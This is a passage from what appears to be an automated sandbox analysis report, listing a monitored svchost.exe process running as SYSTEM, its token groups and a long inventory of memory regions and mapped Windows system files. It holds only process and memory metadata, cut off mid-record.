"0xa35b000" os_pid = "0x360" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d101" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1172 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1173 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1174 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1175 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1176 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1177 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1178 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1179 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1180 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1181 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 1182 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1183 start_va = 0x190000 end_va = 0x19afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 1184 start_va = 0x1a0000 end_va = 0x1acfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1185 start_va = 0x1b0000 end_va = 0x1b3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 1186 start_va = 0x1c0000 end_va = 0x1c9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 1187 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1188 start_va = 0x1e0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1189 start_va = 0x2e0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1190 start_va = 0x3e0000 end_va = 0x3e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1191 start_va = 0x3f0000 end_va = 0x3f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1192 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1193 start_va = 0x410000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 1194 start_va = 0x440000 end_va = 0x443fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1195 start_va = 0x450000 end_va = 0x45dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1196 start_va = 0x460000 end_va = 0x467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1197 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1198 start_va = 0x480000 end_va = 0x607fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1199 start_va = 0x610000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1200 start_va = 0x7a0000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 1201 start_va = 0x860000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1202 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 1203 start_va = 0x8f0000 end_va = 0x90bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 1204 start_va = 0x910000 end_va = 0x910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 1205 start_va = 0x920000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 1206 start_va = 0x9b0000 end_va = 0x9b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 1207 start_va = 0x9c0000 end_va = 0x9c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 1208 start_va = 0x9d0000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1209 start_va = 0xa50000 end_va = 0xab5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1210 start_va = 0xb40000 end_va = 0xb40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 1211 start_va = 0xb50000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 1212 start_va = 0xbd0000 end_va = 0xe9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1213 start_va = 0xea0000 end_va = 0xea0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 1214 start_va = 0xeb0000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 1215 start_va = 0xf30000 end_va = 0xf30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1216 start_va = 0xf40000 end_va = 0xf40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 1217 start_va = 0xf50000 end_va = 0xf5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 1218 start_va = 0xf60000 end_va = 0xf6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f60000" filename = "" Region: id = 1219 start_va = 0xf70000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 1220 start_va = 0xf80000 end_va = 0xf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f80000" filename = "" Region: id = 1221 start_va = 0xf90000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f90000" filename = "" Region: id = 1222 start_va = 0xfa0000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fa0000" filename = "" Region: id = 1223 start_va = 0xfb0000 end_va = 0xfb7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 1224 start_va = 0xfe0000 end_va = 0x105ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 1225 start_va = 0x1070000 end_va = 0x1089fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 1226 start_va = 0x1090000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 1227 start_va = 0x10a0000 end_va = 0x111ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 1228 start_va = 0x1120000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 1229 start_va = 0x1130000 end_va = 0x113ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 1230 start_va = 0x1140000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 1231 start_va = 0x1150000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 1232 start_va = 0x1160000 end_va = 0x116ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 1233 start_va = 0x1170000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Region: id = 1234 start_va = 0x1180000 end_va = 0x118ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 1235 start_va = 0x1190000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 1236 start_va = 0x11a0000 end_va = 0x11a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1237 start_va = 0x11b0000 end_va = 0x11b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 1238 start_va = 0x11c0000 end_va = 0x123ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 1239 start_va = 0x1240000 end_va = 0x1240fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 1240 start_va = 0x1250000 end_va = 0x125ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 1241 start_va = 0x1260000 end_va = 0x1267fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 1242 start_va = 0x1270000 end_va = 0x127ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 1243 start_va = 0x1280000 end_va = 0x128ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 1244 start_va = 0x1290000 end_va = 0x129ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1245 start_va = 0x12a0000 end_va = 0x12affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 1246 start_va = 0x12c0000 end_va = 0x12cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1247 start_va = 0x12d0000 end_va = 0x12d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 1248 start_va = 0x12e0000 end_va = 0x135ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 1249 start_va = 0x1360000 end_va = 0x136ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 1250 start_va = 0x1370000 end_va = 0x137ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 1251 start_va = 0x1380000 end_va = 0x138ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 1252 start_va = 0x1390000 end_va = 0x1397fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001390000" filename = "" Region: id = 1253 start_va = 0x13a0000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 1254 start_va = 0x13d0000 end_va = 0x144ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 1255 start_va = 0x1460000 end_va = 0x14dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001460000" filename = "" Region: id = 1256 start_va = 0x14e0000 end_va = 0x155ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 1257 start_va = 0x1580000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 1258 start_va = 0x1630000 end_va = 0x16affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 1259 start_va = 0x16b0000 end_va = 0x172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 1260 start_va = 0x1750000 end_va = 0x175ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 1261 start_va = 0x1770000 end_va = 0x17effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001770000" filename = "" Region: id = 1262 start_va = 0x1830000 end_va = 0x18affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001830000" filename = "" Region: id = 1263 start_va = 0x18c0000 end_va = 0x193ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018c0000" filename = "" Region: id = 1264 start_va = 0x1940000 end_va = 0x197ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001940000" filename = "" Region: id = 1265 start_va = 0x1980000 end_va = 0x19bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1266 start_va = 0x19e0000 end_va = 0x1a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 1267 start_va = 0x1ab0000 end_va = 0x1b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 1268 start_va = 0x1b50000 end_va = 0x1bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b50000" filename = "" Region: id = 1269 start_va = 0x1bd0000 end_va = 0x1c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 1270 start_va = 0x1c50000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 1271 start_va = 0x1d60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 1272 start_va = 0x1e60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 1273 start_va = 0x1f90000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 1274 start_va = 0x2080000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1275 start_va = 0x2100000 end_va = 0x21bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1276 start_va = 0x21f0000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 1277 start_va = 0x2270000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002270000" filename = "" Region: id = 1278 start_va = 0x23b0000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 1279 start_va = 0x2450000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 1280 start_va = 0x2560000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 1281 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1282 start_va = 0x2730000 end_va = 0x27affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 1283 start_va = 0x27c0000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 1284 start_va = 0x27d0000 end_va = 0x28cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 1285 start_va = 0x2910000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 1286 start_va = 0x2a50000 end_va = 0x2b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 1287 start_va = 0x2ba0000 end_va = 0x2c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 1288 start_va = 0x2ca0000 end_va = 0x2d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ca0000" filename = "" Region: id = 1289 start_va = 0x2e00000 end_va = 0x2e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 1290 start_va = 0x2ec0000 end_va = 0x2f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 1291 start_va = 0x3090000 end_va = 0x310ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 1292 start_va = 0x3110000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 1293 start_va = 0x3430000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 1294 start_va = 0x34c0000 end_va = 0x353ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 1295 start_va = 0x3540000 end_va = 0x35bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 1296 start_va = 0x35c0000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 1297 start_va = 0x36c0000 end_va = 0x373ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 1298 start_va = 0x3740000 end_va = 0x37bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 1299 start_va = 0x3880000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 1300 start_va = 0x3910000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003910000" filename = "" Region: id = 1301 start_va = 0x39d0000 end_va = 0x3a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039d0000" filename = "" Region: id = 1302 start_va = 0x3a70000 end_va = 0x3aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a70000" filename = "" Region: id = 1303 start_va = 0x3b30000 end_va = 0x3baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b30000" filename = "" Region: id = 1304 start_va = 0x3bb0000 end_va = 0x3faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bb0000" filename = "" Region: id = 1305 start_va = 0x3fd0000 end_va = 0x404ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 1306 start_va = 0x4050000 end_va = 0x424ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004050000" filename = "" Region: id = 1307 start_va = 0x4250000 end_va = 0x434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 1308 start_va = 0x4350000 end_va = 0x43cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 1309 start_va = 0x44c0000 end_va = 0x453ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 1310 start_va = 0x45a0000 end_va = 0x461ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 1311 start_va = 0x4620000 end_va = 0x471ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 1312 start_va = 0x4800000 end_va = 0x480ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1313 start_va = 0x4810000 end_va = 0x490ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 1314 start_va = 0x4910000 end_va = 0x4a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004910000" filename = "" Region: id = 1315 start_va = 0x4a10000 end_va = 0x4b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 1316 start_va = 0x4b90000 end_va = 0x4c8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b90000" filename = "" Region: id = 1317 start_va = 0x4c90000 end_va = 0x4d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c90000" filename = "" Region: id = 1318 start_va = 0x4d90000 end_va = 0x5d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 1319 start_va = 0x5e70000 end_va = 0x5eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e70000" filename = "" Region: id = 1320 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1321 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1322 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1323 start_va = 0x779d0000 end_va = 0x779d6fff monitored = 0 entry_point = 0x779d106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1324 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1325 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1326 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1327 start_va = 0xff300000 end_va = 0xff30afff monitored = 0 entry_point = 0xff30246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1328 start_va = 0x7fef0660000 end_va = 0x7fef08b2fff monitored = 0 entry_point = 0x7fef066236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1329 start_va = 0x7fef10e0000 end_va = 0x7fef10eefff monitored = 0 entry_point = 0x7fef10e9a48 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 1330 start_va = 0x7fef1f50000 end_va = 0x7fef1f94fff monitored = 0 entry_point = 0x7fef1f83644 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1331 start_va = 0x7fef1fe0000 end_va = 0x7fef1ff1fff monitored = 0 entry_point = 0x7fef1fe90bc region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1332 start_va = 0x7fef20c0000 end_va = 0x7fef20c9fff monitored = 0 entry_point = 0x7fef20c3994 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1333 start_va = 0x7fef26c0000 end_va = 0x7fef2791fff monitored = 0 entry_point = 0x7fef2751a10 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: 